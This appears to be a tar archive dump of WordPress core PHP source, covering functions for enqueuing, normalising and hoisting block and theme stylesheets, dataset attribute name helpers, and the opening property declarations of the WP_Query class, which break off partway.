$total_inline_size += (int) $style['size'];
}
}
}
/**
* Makes URLs relative to the WordPress installation.
*
* @since 5.9.0
* @access private
*
* @param string $css The CSS to make URLs relative to the WordPress installation.
* @param string $stylesheet_url The URL to the stylesheet.
*
* @return string The CSS with URLs made relative to the WordPress installation.
*/
function _wp_normalize_relative_css_links( $css, $stylesheet_url ) {
return preg_replace_callback(
'#(url\s*\(\s*[\'"]?\s*)([^\'"\)]+)#',
static function ( $matches ) use ( $stylesheet_url ) {
list( , $prefix, $url ) = $matches;
// Short-circuit if the URL does not require normalization.
if (
str_starts_with( $url, 'http:' ) ||
str_starts_with( $url, 'https:' ) ||
str_starts_with( $url, '/' ) ||
str_starts_with( $url, '#' ) ||
str_starts_with( $url, 'data:' )
) {
return $matches[0];
}
// Build the absolute URL.
$absolute_url = dirname( $stylesheet_url ) . '/' . $url;
$absolute_url = str_replace( '/./', '/', $absolute_url );
// Convert to URL related to the site root.
$url = wp_make_link_relative( $absolute_url );
return $prefix . $url;
},
$css
);
}
/**
* Function that enqueues the CSS Custom Properties coming from theme.json.
*
* @since 5.9.0
*/
function wp_enqueue_global_styles_css_custom_properties() {
wp_register_style( 'global-styles-css-custom-properties', false );
wp_add_inline_style( 'global-styles-css-custom-properties', wp_get_global_stylesheet( array( 'variables' ) ) );
wp_enqueue_style( 'global-styles-css-custom-properties' );
}
/**
* Hooks inline styles in the proper place, depending on the active theme.
*
* @since 5.9.1
* @since 6.1.0 Added the `$priority` parameter.
*
* For block themes, styles are loaded in the head.
* For classic ones, styles are loaded in the body because the wp_head action happens before render_block.
*
* @link https://core.trac.wordpress.org/ticket/53494.
*
* @param string $style String containing the CSS styles to be added.
* @param int $priority To set the priority for the add_action.
*/
function wp_enqueue_block_support_styles( $style, $priority = 10 ) {
$action_hook_name = 'wp_footer';
if ( wp_is_block_theme() ) {
$action_hook_name = 'wp_head';
}
add_action(
$action_hook_name,
static function () use ( $style ) {
echo "<style>$style</style>\n";
},
$priority
);
}
/**
* Fetches, processes and compiles stored core styles, then combines and renders them to the page.
* Styles are stored via the style engine API.
*
* @link https://developer.wordpress.org/block-editor/reference-guides/packages/packages-style-engine/
*
* @since 6.1.0
*
* @param array $options {
* Optional. An array of options to pass to wp_style_engine_get_stylesheet_from_context().
* Default empty array.
*
* @type bool $optimize Whether to optimize the CSS output, e.g., combine rules.
* Default false.
* @type bool $prettify Whether to add new lines and indents to output.
* Default to whether the `SCRIPT_DEBUG` constant is defined.
* }
*/
function wp_enqueue_stored_styles( $options = array() ) {
// Note: Styles printed at wp_footer for classic themes may still end up in the head due to wp_load_classic_theme_block_styles_on_demand().
$is_block_theme = wp_is_block_theme();
$is_classic_theme = ! $is_block_theme;
/*
* For block themes, this function prints stored styles in the header.
* For classic themes, in the footer.
*/
if (
( $is_block_theme && doing_action( 'wp_footer' ) ) ||
( $is_classic_theme && doing_action( 'wp_enqueue_scripts' ) )
) {
return;
}
$core_styles_keys = array( 'block-supports' );
$compiled_core_stylesheet = '';
$style_tag_id = 'core';
// Adds comment if code is prettified to identify core styles sections in debugging.
$should_prettify = isset( $options['prettify'] ) ? true === $options['prettify'] : defined( 'SCRIPT_DEBUG' ) && SCRIPT_DEBUG;
foreach ( $core_styles_keys as $style_key ) {
if ( $should_prettify ) {
$compiled_core_stylesheet .= "/**\n * Core styles: $style_key\n */\n";
}
// Chains core store ids to signify what the styles contain.
$style_tag_id .= '-' . $style_key;
$compiled_core_stylesheet .= wp_style_engine_get_stylesheet_from_context( $style_key, $options );
}
// Combines Core styles.
if ( ! empty( $compiled_core_stylesheet ) ) {
wp_register_style( $style_tag_id, false );
wp_add_inline_style( $style_tag_id, $compiled_core_stylesheet );
wp_enqueue_style( $style_tag_id );
}
// Prints out any other stores registered by themes or otherwise.
$additional_stores = WP_Style_Engine_CSS_Rules_Store::get_stores();
foreach ( array_keys( $additional_stores ) as $store_name ) {
if ( in_array( $store_name, $core_styles_keys, true ) ) {
continue;
}
$styles = wp_style_engine_get_stylesheet_from_context( $store_name, $options );
if ( ! empty( $styles ) ) {
$key = "wp-style-engine-$store_name";
wp_register_style( $key, false );
wp_add_inline_style( $key, $styles );
wp_enqueue_style( $key );
}
}
}
/**
* Enqueues a stylesheet for a specific block.
*
* If the theme has opted-in to load block styles on demand,
* then the stylesheet will be enqueued on-render,
* otherwise when the block inits.
*
* @since 5.9.0
*
* @param string $block_name The block-name, including namespace.
* @param array $args {
* An array of arguments. See wp_register_style() for full information about each argument.
*
* @type string $handle The handle for the stylesheet.
* @type string|false $src The source URL of the stylesheet.
* @type string[] $deps Array of registered stylesheet handles this stylesheet depends on.
* @type string|bool|null $ver Stylesheet version number.
* @type string $media The media for which this stylesheet has been defined.
* @type string|null $path Absolute path to the stylesheet, so that it can potentially be inlined.
* }
*/
function wp_enqueue_block_style( $block_name, $args ) {
$args = wp_parse_args(
$args,
array(
'handle' => '',
'src' => '',
'deps' => array(),
'ver' => false,
'media' => 'all',
)
);
/**
* Callback function to register and enqueue styles.
*
* @param string $content When the callback is used for the render_block filter,
* the content needs to be returned so the function parameter
* is to ensure the content exists.
* @return string Block content.
*/
$callback = static function ( $content ) use ( $args ) {
// Register the stylesheet.
if ( ! empty( $args['src'] ) ) {
wp_register_style( $args['handle'], $args['src'], $args['deps'], $args['ver'], $args['media'] );
}
// Add `path` data if provided.
if ( isset( $args['path'] ) ) {
wp_style_add_data( $args['handle'], 'path', $args['path'] );
// Get the RTL file path.
$rtl_file_path = str_replace( '.css', '-rtl.css', $args['path'] );
// Add RTL stylesheet.
if ( file_exists( $rtl_file_path ) ) {
wp_style_add_data( $args['handle'], 'rtl', 'replace' );
if ( is_rtl() ) {
wp_style_add_data( $args['handle'], 'path', $rtl_file_path );
}
}
}
// Enqueue the stylesheet.
wp_enqueue_style( $args['handle'] );
return $content;
};
$hook = did_action( 'wp_enqueue_scripts' ) ? 'wp_footer' : 'wp_enqueue_scripts';
if ( wp_should_load_block_assets_on_demand() ) {
/**
* Callback function to register and enqueue styles.
*
* @param string $content The block content.
* @param array $block The full block, including name and attributes.
* @return string Block content.
*/
$callback_separate = static function ( $content, $block ) use ( $block_name, $callback ) {
if ( ! empty( $block['blockName'] ) && $block_name === $block['blockName'] ) {
return $callback( $content );
}
return $content;
};
/*
* The filter's callback here is an anonymous function because
* using a named function in this case is not possible.
*
* The function cannot be unhooked, however, users are still able
* to dequeue the stylesheets registered/enqueued by the callback
* which is why in this case, using an anonymous function
* was deemed acceptable.
*/
add_filter( 'render_block', $callback_separate, 10, 2 );
return;
}
/*
* The filter's callback here is an anonymous function because
* using a named function in this case is not possible.
*
* The function cannot be unhooked, however, users are still able
* to dequeue the stylesheets registered/enqueued by the callback
* which is why in this case, using an anonymous function
* was deemed acceptable.
*/
add_filter( $hook, $callback );
// Enqueue assets in the editor.
add_action( 'enqueue_block_assets', $callback );
}
/**
* Loads classic theme styles on classic themes in the frontend.
*
* This is used for backwards compatibility for Button and File blocks specifically.
*
* @since 6.1.0
* @since 6.2.0 Added File block styles.
* @since 6.8.0 Moved stylesheet registration outside of this function.
*/
function wp_enqueue_classic_theme_styles() {
if ( ! wp_theme_has_theme_json() ) {
wp_enqueue_style( 'classic-theme-styles' );
}
}
/**
* Enqueues the assets required for the Command Palette.
*
* @since 6.9.0
*
* @global array $menu
* @global array $submenu
*/
function wp_enqueue_command_palette_assets() {
global $menu, $submenu;
$command_palette_settings = array(
'is_network_admin' => is_network_admin(),
);
if ( $menu ) {
$menu_commands = array();
foreach ( $menu as $menu_item ) {
if ( empty( $menu_item[0] ) || ! empty( $menu_item[1] ) && ! current_user_can( $menu_item[1] ) ) {
continue;
}
// Remove all HTML tags and their contents.
$menu_label = $menu_item[0];
while ( preg_match( '/<[^>]*>/', $menu_label ) ) {
$menu_label = preg_replace( '/<[^>]*>.*?<\/[^>]*>|<[^>]*\/>|<[^>]*>/s', '', $menu_label );
}
$menu_label = trim( $menu_label );
$menu_url = '';
$menu_slug = $menu_item[2];
if ( preg_match( '/\.php($|\?)/', $menu_slug ) || wp_http_validate_url( $menu_slug ) ) {
$menu_url = $menu_slug;
} elseif ( ! empty( menu_page_url( $menu_slug, false ) ) ) {
$menu_url = html_entity_decode( menu_page_url( $menu_slug, false ), ENT_QUOTES, get_bloginfo( 'charset' ) );
}
if ( $menu_url ) {
$menu_commands[] = array(
'label' => $menu_label,
'url' => $menu_url,
'name' => $menu_slug,
);
}
if ( array_key_exists( $menu_slug, $submenu ) ) {
foreach ( $submenu[ $menu_slug ] as $submenu_item ) {
if ( empty( $submenu_item[0] ) || ! empty( $submenu_item[1] ) && ! current_user_can( $submenu_item[1] ) ) {
continue;
}
// Remove all HTML tags and their contents.
$submenu_label = $submenu_item[0];
while ( preg_match( '/<[^>]*>/', $submenu_label ) ) {
$submenu_label = preg_replace( '/<[^>]*>.*?<\/[^>]*>|<[^>]*\/>|<[^>]*>/s', '', $submenu_label );
}
$submenu_label = trim( $submenu_label );
$submenu_url = '';
$submenu_slug = $submenu_item[2];
if ( preg_match( '/\.php($|\?)/', $submenu_slug ) || wp_http_validate_url( $submenu_slug ) ) {
$submenu_url = $submenu_slug;
} elseif ( ! empty( menu_page_url( $submenu_slug, false ) ) ) {
$submenu_url = html_entity_decode( menu_page_url( $submenu_slug, false ), ENT_QUOTES, get_bloginfo( 'charset' ) );
}
if ( $submenu_url ) {
$menu_commands[] = array(
'label' => sprintf(
/* translators: 1: Menu label, 2: Submenu label. */
__( '%1$s > %2$s' ),
$menu_label,
$submenu_label
),
'url' => $submenu_url,
'name' => $menu_slug . '-' . $submenu_item[2],
);
}
}
}
}
$command_palette_settings['menu_commands'] = $menu_commands;
}
wp_enqueue_script( 'wp-commands' );
wp_enqueue_style( 'wp-commands' );
wp_enqueue_script( 'wp-core-commands' );
wp_add_inline_script(
'wp-core-commands',
sprintf(
'wp.coreCommands.initializeCommandPalette( %s );',
wp_json_encode( $command_palette_settings, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES )
)
);
}
/**
* Removes leading and trailing _empty_ script tags.
*
* This is a helper meant to be used for literal script tag construction
* within `wp_get_inline_script_tag()` or `wp_print_inline_script_tag()`.
* It removes the literal values of "<script>" and "</script>" from
* around an inline script after trimming whitespace. Typically this
* is used in conjunction with output buffering, where `ob_get_clean()`
* is passed as the `$contents` argument.
*
* Example:
*
* // Strips exact literal empty SCRIPT tags.
* $js = '<script>sayHello();</script>;
* 'sayHello();' === wp_remove_surrounding_empty_script_tags( $js );
*
* // Otherwise if anything is different it warns in the JS console.
* $js = '<script type="text/javascript">console.log( "hi" );</script>';
* 'console.error( ... )' === wp_remove_surrounding_empty_script_tags( $js );
*
* @since 6.4.0
* @access private
*
* @see wp_print_inline_script_tag()
* @see wp_get_inline_script_tag()
*
* @param string $contents Script body with manually created SCRIPT tag literals.
* @return string Script body without surrounding script tag literals, or
* original contents if both exact literals aren't present.
*/
function wp_remove_surrounding_empty_script_tags( $contents ) {
$contents = trim( $contents );
$opener = '<SCRIPT>';
$closer = '</SCRIPT>';
if (
strlen( $contents ) > strlen( $opener ) + strlen( $closer ) &&
strtoupper( substr( $contents, 0, strlen( $opener ) ) ) === $opener &&
strtoupper( substr( $contents, -strlen( $closer ) ) ) === $closer
) {
return substr( $contents, strlen( $opener ), -strlen( $closer ) );
} else {
$error_message = __( 'Expected string to start with script tag (without attributes) and end with script tag, with optional whitespace.' );
_doing_it_wrong( __FUNCTION__, $error_message, '6.4' );
return sprintf(
'console.error(%s)',
wp_json_encode(
sprintf(
/* translators: %s: wp_remove_surrounding_empty_script_tags() */
__( 'Function %s used incorrectly in PHP.' ),
'wp_remove_surrounding_empty_script_tags()'
) . ' ' . $error_message
)
);
}
}
/**
* Adds hooks to load block styles on demand in classic themes.
*
* @since 6.9.0
*
* @see _add_default_theme_supports()
*/
function wp_load_classic_theme_block_styles_on_demand() {
// This is not relevant to block themes, as they are opted in to loading separate styles on demand via _add_default_theme_supports().
if ( wp_is_block_theme() ) {
return;
}
/*
* Make sure that wp_should_output_buffer_template_for_enhancement() returns true even if there aren't any
* `wp_template_enhancement_output_buffer` filters added, but do so at priority zero so that applications which
* wish to stream responses can more easily turn this off.
*/
add_filter( 'wp_should_output_buffer_template_for_enhancement', '__return_true', 0 );
// If a site has opted out of the template enhancement output buffer, then bail.
if ( ! wp_should_output_buffer_template_for_enhancement() ) {
return;
}
// The following two filters are added by default for block themes in _add_default_theme_supports().
/*
* Load separate block styles so that the large block-library stylesheet is not enqueued unconditionally, and so
* that block-specific styles will only be enqueued when they are used on the page. A priority of zero allows for
* this to be easily overridden by themes which wish to opt out. If a site has explicitly opted out of loading
* separate block styles, then abort.
*/
add_filter( 'should_load_separate_core_block_assets', '__return_true', 0 );
if ( ! wp_should_load_separate_core_block_assets() ) {
return;
}
/*
* Also ensure that block assets are loaded on demand (although the default value is from should_load_separate_core_block_assets).
* As above, a priority of zero allows for this to be easily overridden by themes which wish to opt out. If a site
* has explicitly opted out of loading block styles on demand, then abort.
*/
add_filter( 'should_load_block_assets_on_demand', '__return_true', 0 );
if ( ! wp_should_load_block_assets_on_demand() ) {
return;
}
// Add hooks which require the presence of the output buffer. Ideally the above two filters could be added here, but they run too early.
add_action( 'wp_template_enhancement_output_buffer_started', 'wp_hoist_late_printed_styles' );
}
/**
* Adds the hooks needed for CSS output to be delayed until after the content of the page has been established.
*
* @since 6.9.0
*
* @see wp_load_classic_theme_block_styles_on_demand()
* @see _wp_footer_scripts()
*/
function wp_hoist_late_printed_styles() {
// Skip the embed template on-demand styles aren't relevant, and there is no wp_head action.
if ( is_embed() ) {
return;
}
// Capture the styles enqueued at the enqueue_block_assets action, so that non-core block styles and global styles can be inserted afterwards during hoisting.
$style_handles_at_enqueue_block_assets = array();
add_action(
'enqueue_block_assets',
static function () use ( &$style_handles_at_enqueue_block_assets ) {
$style_handles_at_enqueue_block_assets = wp_styles()->queue;
},
PHP_INT_MIN
);
add_action(
'enqueue_block_assets',
static function () use ( &$style_handles_at_enqueue_block_assets ) {
$style_handles_at_enqueue_block_assets = array_values( array_diff( wp_styles()->queue, $style_handles_at_enqueue_block_assets ) );
},
PHP_INT_MAX
);
/*
* Add a placeholder comment into the inline styles for wp-block-library, after which the late block styles
* can be hoisted from the footer to be printed in the header by means of a filter below on the template enhancement
* output buffer. The `wp_print_styles` action is used to ensure that if the inline style gets replaced at
* `enqueue_block_assets` or `wp_enqueue_scripts` that the placeholder will be sure to be present.
*/
$placeholder = sprintf( '/*%s*/', uniqid( 'wp_block_styles_on_demand_placeholder:' ) );
add_action(
'wp_print_styles',
static function () use ( $placeholder ) {
wp_add_inline_style( 'wp-block-library', $placeholder );
}
);
/*
* Create a substitute for `print_late_styles()` which is aware of block styles. This substitute does not print
* the styles, but it captures what would be printed for block styles and non-block styles so that they can be
* later hoisted to the HEAD in the template enhancement output buffer. This will run at `wp_print_footer_scripts`
* before `print_footer_scripts()` is called.
*/
$printed_core_block_styles = '';
$printed_other_block_styles = '';
$printed_global_styles = '';
$printed_late_styles = '';
$capture_late_styles = static function () use ( &$printed_core_block_styles, &$printed_other_block_styles, &$printed_global_styles, &$printed_late_styles ) {
// Gather the styles related to on-demand block enqueues.
$all_core_block_style_handles = array();
$all_other_block_style_handles = array();
foreach ( WP_Block_Type_Registry::get_instance()->get_all_registered() as $block_type ) {
if ( str_starts_with( $block_type->name, 'core/' ) ) {
foreach ( $block_type->style_handles as $style_handle ) {
$all_core_block_style_handles[] = $style_handle;
}
} else {
foreach ( $block_type->style_handles as $style_handle ) {
$all_other_block_style_handles[] = $style_handle;
}
}
}
/*
* First print all styles related to blocks which should be inserted right after the wp-block-library stylesheet
* to preserve the CSS cascade. The logic in this `if` statement is derived from `wp_print_styles()`.
*/
$enqueued_core_block_styles = array_values( array_intersect( $all_core_block_style_handles, wp_styles()->queue ) );
if ( count( $enqueued_core_block_styles ) > 0 ) {
ob_start();
wp_styles()->do_items( $enqueued_core_block_styles );
$printed_core_block_styles = ob_get_clean();
}
// Non-core block styles get printed after the classic-theme-styles stylesheet.
$enqueued_other_block_styles = array_values( array_intersect( $all_other_block_style_handles, wp_styles()->queue ) );
if ( count( $enqueued_other_block_styles ) > 0 ) {
ob_start();
wp_styles()->do_items( $enqueued_other_block_styles );
$printed_other_block_styles = ob_get_clean();
}
// Capture the global-styles so that it can be printed separately after classic-theme-styles and other styles enqueued at enqueue_block_assets.
if ( wp_style_is( 'global-styles' ) ) {
ob_start();
wp_styles()->do_items( array( 'global-styles' ) );
$printed_global_styles = ob_get_clean();
}
/*
* Print all remaining styles not related to blocks. This contains a subset of the logic from
* `print_late_styles()`, without admin-specific logic and the `print_late_styles` filter to control whether
* late styles are printed (since they are being hoisted anyway).
*/
ob_start();
wp_styles()->do_footer_items();
$printed_late_styles = ob_get_clean();
};
/*
* If `_wp_footer_scripts()` was unhooked from the `wp_print_footer_scripts` action, or if `wp_print_footer_scripts()`
* was unhooked from running at the `wp_footer` action, then only add a callback to `wp_footer` which will capture the
* late-printed styles.
*
* Otherwise, in the normal case where `_wp_footer_scripts()` will run at the `wp_print_footer_scripts` action, then
* swap out `_wp_footer_scripts()` with an alternative which captures the printed styles (for hoisting to HEAD) before
* proceeding with printing the footer scripts.
*/
$wp_print_footer_scripts_priority = has_action( 'wp_print_footer_scripts', '_wp_footer_scripts' );
if ( false === $wp_print_footer_scripts_priority || false === has_action( 'wp_footer', 'wp_print_footer_scripts' ) ) {
// The normal priority for wp_print_footer_scripts() is to run at 20.
add_action( 'wp_footer', $capture_late_styles, 20 );
} else {
remove_action( 'wp_print_footer_scripts', '_wp_footer_scripts', $wp_print_footer_scripts_priority );
add_action(
'wp_print_footer_scripts',
static function () use ( $capture_late_styles ) {
$capture_late_styles();
print_footer_scripts();
},
$wp_print_footer_scripts_priority
);
}
// Replace placeholder with the captured late styles.
add_filter(
'wp_template_enhancement_output_buffer',
static function ( $buffer ) use ( $placeholder, &$style_handles_at_enqueue_block_assets, &$printed_core_block_styles, &$printed_other_block_styles, &$printed_global_styles, &$printed_late_styles ) {
// Anonymous subclass of WP_HTML_Tag_Processor which exposes underlying bookmark spans.
$processor = new class( $buffer ) extends WP_HTML_Tag_Processor {
/**
* Gets the span for the current token.
*
* @return WP_HTML_Span Current token span.
*/
private function get_span(): WP_HTML_Span {
// Note: This call will never fail according to the usage of this class, given it is always called after ::next_tag() is true.
$this->set_bookmark( 'here' );
return $this->bookmarks['here'];
}
/**
* Inserts text before the current token.
*
* @param string $text Text to insert.
*/
public function insert_before( string $text ) {
$this->lexical_updates[] = new WP_HTML_Text_Replacement( $this->get_span()->start, 0, $text );
}
/**
* Inserts text after the current token.
*
* @param string $text Text to insert.
*/
public function insert_after( string $text ) {
$span = $this->get_span();
$this->lexical_updates[] = new WP_HTML_Text_Replacement( $span->start + $span->length, 0, $text );
}
/**
* Removes the current token.
*/
public function remove() {
$span = $this->get_span();
$this->lexical_updates[] = new WP_HTML_Text_Replacement( $span->start, $span->length, '' );
}
};
// Locate the insertion points in the HEAD.
while ( $processor->next_tag( array( 'tag_closers' => 'visit' ) ) ) {
if (
'STYLE' === $processor->get_tag() &&
'wp-block-library-inline-css' === $processor->get_attribute( 'id' )
) {
$processor->set_bookmark( 'wp_block_library' );
} elseif ( 'HEAD' === $processor->get_tag() && $processor->is_tag_closer() ) {
$processor->set_bookmark( 'head_end' );
break;
} elseif ( ( 'STYLE' === $processor->get_tag() || 'LINK' === $processor->get_tag() ) && $processor->get_attribute( 'id' ) ) {
$id = $processor->get_attribute( 'id' );
$handle = null;
if ( 'STYLE' === $processor->get_tag() ) {
if ( preg_match( '/^(.+)-inline-css$/', $id, $matches ) ) {
$handle = $matches[1];
}
} elseif ( preg_match( '/^(.+)-css$/', $id, $matches ) ) {
$handle = $matches[1];
}
if ( 'classic-theme-styles' === $handle ) {
$processor->set_bookmark( 'classic_theme_styles' );
}
if ( $handle && in_array( $handle, $style_handles_at_enqueue_block_assets, true ) ) {
if ( ! $processor->has_bookmark( 'first_style_at_enqueue_block_assets' ) ) {
$processor->set_bookmark( 'first_style_at_enqueue_block_assets' );
}
$processor->set_bookmark( 'last_style_at_enqueue_block_assets' );
}
}
}
/*
* Insert block styles right after wp-block-library (if it is present). The placeholder CSS comment will
* always be added to the wp-block-library inline style since it gets printed at `wp_head` before the blocks
* are rendered. This means that there may not actually be any block styles to hoist from the footer to
* insert after this inline style. The placeholder CSS comment needs to be added so that the inline style
* gets printed, but if the resulting inline style is empty after the placeholder is removed, then the
* inline style is removed.
*/
if ( $processor->has_bookmark( 'wp_block_library' ) ) {
$processor->seek( 'wp_block_library' );
$css_text = $processor->get_modifiable_text();
/*
* A placeholder CSS comment is added to the inline style in order to force an inline STYLE tag to
* be printed. Now that we've located the inline style, the placeholder comment can be removed. If
* there is no CSS left in the STYLE tag after removing the placeholder (aside from the sourceURL
* comment), then remove the STYLE entirely.
*/
$css_text = str_replace( $placeholder, '', $css_text );
if ( preg_match( ':^/\*# sourceURL=\S+? \*/$:', trim( $css_text ) ) ) {
$processor->remove();
} else {
$processor->set_modifiable_text( $css_text );
}
$inserted_after = $printed_core_block_styles;
$printed_core_block_styles = '';
// If the classic-theme-styles is absent, then the third-party block styles cannot be inserted after it, so they get inserted here.
if ( ! $processor->has_bookmark( 'classic_theme_styles' ) ) {
if ( '' !== $printed_other_block_styles ) {
$inserted_after .= $printed_other_block_styles;
}
$printed_other_block_styles = '';
// If there aren't any other styles printed at enqueue_block_assets either, then the global styles need to also be printed here.
if ( ! $processor->has_bookmark( 'last_style_at_enqueue_block_assets' ) ) {
if ( '' !== $printed_global_styles ) {
$inserted_after .= $printed_global_styles;
}
$printed_global_styles = '';
}
}
if ( '' !== $inserted_after ) {
$processor->insert_after( "\n" . $inserted_after );
}
}
// Insert global-styles after the styles enqueued at enqueue_block_assets.
if ( '' !== $printed_global_styles && $processor->has_bookmark( 'last_style_at_enqueue_block_assets' ) ) {
$processor->seek( 'last_style_at_enqueue_block_assets' );
$processor->insert_after( "\n" . $printed_global_styles );
$printed_global_styles = '';
if ( ! $processor->has_bookmark( 'classic_theme_styles' ) && '' !== $printed_other_block_styles ) {
$processor->insert_after( "\n" . $printed_other_block_styles );
$printed_other_block_styles = '';
}
}
// Insert third-party block styles right after the classic-theme-styles.
if ( '' !== $printed_other_block_styles && $processor->has_bookmark( 'classic_theme_styles' ) ) {
$processor->seek( 'classic_theme_styles' );
$processor->insert_after( "\n" . $printed_other_block_styles );
$printed_other_block_styles = '';
}
// Print all remaining styles.
$remaining_styles = $printed_core_block_styles . $printed_other_block_styles . $printed_global_styles . $printed_late_styles;
if ( $remaining_styles && $processor->has_bookmark( 'head_end' ) ) {
$processor->seek( 'head_end' );
$processor->insert_before( $remaining_styles . "\n" );
}
return $processor->get_updated_html();
}
);
}
/**
* Return the corresponding JavaScript `dataset` name for an attribute
* if it represents a custom data attribute, or `null` if not.
*
* Custom data attributes appear in an element's `dataset` property in a
* browser, but there's a specific way the names are translated from HTML
* into JavaScript. This function indicates how the name would appear in
* JavaScript if a browser would recognize it as a custom data attribute.
*
* Example:
*
* // Dash-letter pairs turn into capital letters.
* 'postId' === wp_js_dataset_name( 'data-post-id' );
* 'Before' === wp_js_dataset_name( 'data--before' );
* '-One--Two---' === wp_js_dataset_name( 'data---one---two---' );
*
* // Not every attribute name will be interpreted as a custom data attribute.
* null === wp_js_dataset_name( 'post-id' );
* null === wp_js_dataset_name( 'data' );
*
* // Some very surprising names will; for example, a property whose name is the empty string.
* '' === wp_js_dataset_name( 'data-' );
* 0 === strlen( wp_js_dataset_name( 'data-' ) );
*
* @since 6.9.0
*
* @see https://html.spec.whatwg.org/#concept-domstringmap-pairs
* @see \wp_html_custom_data_attribute_name()
*
* @param string $html_attribute_name Raw attribute name as found in the source HTML.
* @return string|null Transformed `dataset` name, if interpretable as a custom data attribute, else `null`.
*/
function wp_js_dataset_name( string $html_attribute_name ): ?string {
if ( 0 !== substr_compare( $html_attribute_name, 'data-', 0, 5, true ) ) {
return null;
}
$end = strlen( $html_attribute_name );
/*
* If it contains characters which would end the attribute name parsing then
* something else is wrong and this contains more than just an attribute name.
*/
if ( ( $end - 5 ) !== strcspn( $html_attribute_name, "=/> \t\f\r\n", 5 ) ) {
return null;
}
/**
* > For each name in list, for each U+002D HYPHEN-MINUS character (-)
* > in the name that is followed by an ASCII lower alpha, remove the
* > U+002D HYPHEN-MINUS character (-) and replace the character that
* > followed it by the same character converted to ASCII uppercase.
*
* @see https://html.spec.whatwg.org/#concept-domstringmap-pairs
*/
$custom_name = '';
$at = 5;
$was_at = $at;
while ( $at < $end ) {
$next_dash_at = strpos( $html_attribute_name, '-', $at );
if ( false === $next_dash_at || $next_dash_at === $end - 1 ) {
break;
}
// Transform `-a` to `A`, for example.
$c = $html_attribute_name[ $next_dash_at + 1 ];
if ( ( $c >= 'A' && $c <= 'Z' ) || ( $c >= 'a' && $c <= 'z' ) ) {
$prefix = substr( $html_attribute_name, $was_at, $next_dash_at - $was_at );
$custom_name .= strtolower( $prefix );
$custom_name .= strtoupper( $c );
$at = $next_dash_at + 2;
$was_at = $at;
continue;
}
$at = $next_dash_at + 1;
}
// If nothing has been added it means there are no dash-letter pairs; return the name as-is.
return '' === $custom_name
? strtolower( substr( $html_attribute_name, 5 ) )
: ( $custom_name . strtolower( substr( $html_attribute_name, $was_at ) ) );
}
/**
* Returns a corresponding HTML attribute name for the given name,
* if that name were found in a JS element’s `dataset` property.
*
* Example:
*
* 'data-post-id' === wp_html_custom_data_attribute_name( 'postId' );
* 'data--before' === wp_html_custom_data_attribute_name( 'Before' );
* 'data---one---two---' === wp_html_custom_data_attribute_name( '-One--Two---' );
*
* // Not every attribute name will be interpreted as a custom data attribute.
* null === wp_html_custom_data_attribute_name( '/not-an-attribute/' );
* null === wp_html_custom_data_attribute_name( 'no spaces' );
*
* // Some very surprising names will; for example, a property whose name is the empty string.
* 'data-' === wp_html_custom_data_attribute_name( '' );
*
* @since 6.9.0
*
* @see https://html.spec.whatwg.org/#concept-domstringmap-pairs
* @see \wp_js_dataset_name()
*
* @param string $js_dataset_name Name of JS `dataset` property to transform.
* @return string|null Corresponding name of an HTML custom data attribute for the given dataset name,
* if possible to represent in HTML, otherwise `null`.
*/
function wp_html_custom_data_attribute_name( string $js_dataset_name ): ?string {
$end = strlen( $js_dataset_name );
if ( 0 === $end ) {
return 'data-';
}
/*
* If it contains characters which would end the attribute name parsing then
* something it’s not possible to represent this in HTML.
*/
if ( strcspn( $js_dataset_name, "=/> \t\f\r\n" ) !== $end ) {
return null;
}
$html_name = 'data-';
$at = 0;
$was_at = $at;
while ( $at < $end ) {
$next_upper_after = strcspn( $js_dataset_name, 'ABCDEFGHIJKLMNOPQRSTUVWXYZ', $at );
$next_upper_at = $at + $next_upper_after;
if ( $next_upper_at >= $end ) {
break;
}
$prefix = substr( $js_dataset_name, $was_at, $next_upper_at - $was_at );
$html_name .= strtolower( $prefix );
$html_name .= '-' . strtolower( $js_dataset_name[ $next_upper_at ] );
$at = $next_upper_at + 1;
$was_at = $at;
}
if ( $was_at < $end ) {
$html_name .= strtolower( substr( $js_dataset_name, $was_at ) );
}
return $html_name;
}
class-wp-query.php 0000666 00000477640 15224151220 0010171 0 ustar 00 <?php
/**
* Query API: WP_Query class
*
* @package WordPress
* @subpackage Query
* @since 4.7.0
*/
/**
* The WordPress Query class.
*
* @link https://developer.wordpress.org/reference/classes/wp_query/
*
* @since 1.5.0
* @since 4.5.0 Removed the `$comments_popup` property.
*/
#[AllowDynamicProperties]
class WP_Query {
/**
* Query vars set by the user.
*
* @since 1.5.0
* @var array
*/
public $query;
/**
* Query vars, after parsing.
*
* @since 1.5.0
* @var array
*/
public $query_vars = array();
/**
* Taxonomy query, as passed to get_tax_sql().
*
* @since 3.1.0
* @var WP_Tax_Query|null A taxonomy query instance.
*/
public $tax_query;
/**
* Metadata query container.
*
* @since 3.2.0
* @var WP_Meta_Query A meta query instance.
*/
public $meta_query = false;
/**
* Date query container.
*
* @since 3.7.0
* @var WP_Date_Query A date query instance.
*/
public $date_query = false;
/**
* Holds the data for a single object that is queried.
*
* Holds the contents of a post, page, category, attachment.
*
* @since 1.5.0
* @var WP_Term|WP_Post_Type|WP_Post|WP_User|null
*/
public $queried_object;
/**
* The ID of the queried object.
*
* @since 1.5.0
* @var int
*/
public $queried_object_id;
/**
* SQL for the database query.
*
* @since 2.0.1
* @var string
*/
public $request;
/**
* Array of post objects or post IDs.
*
* @since 1.5.0
* @var WP_Post[]|int[]
*/
public $posts;
/**
* The number of posts for the current query.
*
* @since 1.5.0
* @var int
*/
public $post_count = 0;
/**
* Index of the current item in the loop.
*
* @since 1.5.0
* @var int
*/
public $current_post = -1;
/**
* Whether the caller is before the loop.
*
* @since 6.3.0
* @var bool
*/
public $before_loop = true;
/**
* Whether the loop has started and the caller is in the loop.
*
* @since 2.0.0
* @var bool
*/
public $in_the_loop = false;
/**
* The current post.
*
* This property does not get populated when the `fields` argument is set to
* `ids` or `id=>parent`.
*
* @since 1.5.0
* @var WP_Post|null
*/
public $post;
/**
* The list of comments for current post.
*
* @since 2.2.0
* @var WP_Comment[]
*/
public $comments;
/**
* The number of comments for the posts.
*
* @since 2.2.0
* @var int
*/
public $comment_count = 0;
/**
* The index of the comment in the comment loop.
*
* @since 2.2.0
* @var int
*/
public $current_comment = -1;
/**
* Current comment object.
*
* @since 2.2.0
* @var WP_Comment
*/
public $comment;
/**
* The number of found posts for the current query.
*
* If limit clause was not used, equals $post_count.
*
* @since 2.1.0
* @var int
*/
public $found_posts = 0;
/**
* The number of pages.
*
* @since 2.1.0
* @var int
*/
public $max_num_pages = 0;
/**
* The number of comment pages.
*
* @since 2.7.0
